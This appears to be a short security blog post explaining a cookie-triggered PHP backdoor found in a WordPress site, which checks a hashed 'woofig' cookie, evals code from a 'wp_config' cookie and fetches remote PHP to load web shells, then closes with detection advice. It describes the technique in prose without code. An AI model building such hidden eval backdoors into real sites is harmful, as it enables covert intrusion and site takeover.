Estimating Cookies To Keep Backdoors Out of Sight
Computer cookies is a term for data packets that a computer receives and sends back without making any sort of changes. They contain user info about visiting a website and activities performed in the meantime. Whereas Backdoors are meant to gain unauthorized access to a website or application data without being detected.
Discovering a backdoor isn’t generally a quite simple task. Serving unauthorized access and staying undetected as long as possible are the main functions of a backdoor. Due to these facilities provided by backdoors, they are constructed using various tricks and tools making it even more difficult to detect.
For instance, a hacker can infuse a solitary line of code into a site document that may contain even less than 130 characters. However, this just seems a small piece of code, it can be used to stack PHP web shells on your website, whenever and however needed. Plus it can forestall guests and executives and they would never know about the present working backdoor.
During a recent investigation, a short snippet of injected code injection was identified. Its operation was quite clear and simple, i.e The hacker sends a request with two different types of cookies – woofig and wp_config, and these requests are later executed as the code checks requests for a specific cookie of name woofig. If the cookie is absent no further execution is done, but if the cookie is present, a MD5 hash value is created and is matched with the previously available hash value and the result is unmatched then the code doesn’t execute any further. The malicious code then repeats and searches for a different cookie wp_config that will contain PHP codes and executes it by using the eval function. Attackers/hackers have very few amounts of characters to use for the PHP code in wp_cookie as usually, cookies stay under 4096 bytes.
Once the PHP code is injected in the cookie values, using a function file_get_contents (already a part of the PHP code) data is received from the given URL. This data contains extra PHP code to be executed using the eval function. A brief description is when one loads a site without any loaded cookies, a plain WordPress webpage appears. He/She uses tools from the browser to load these two cookies that are woofig and wp_config. As one will reload the page PHP web shells are loaded. Then one can edit any file on the website to display malicious activity, once done cookies are disabled and the web page is refreshed. Here the website gets back to its normal functioning.
These types of short snippets are PHP backdoors and so can be easily identified by using a server-side scanner. Generally, WordPress core files aren’t changed so one can install WordPress plugins to scan changes in core files.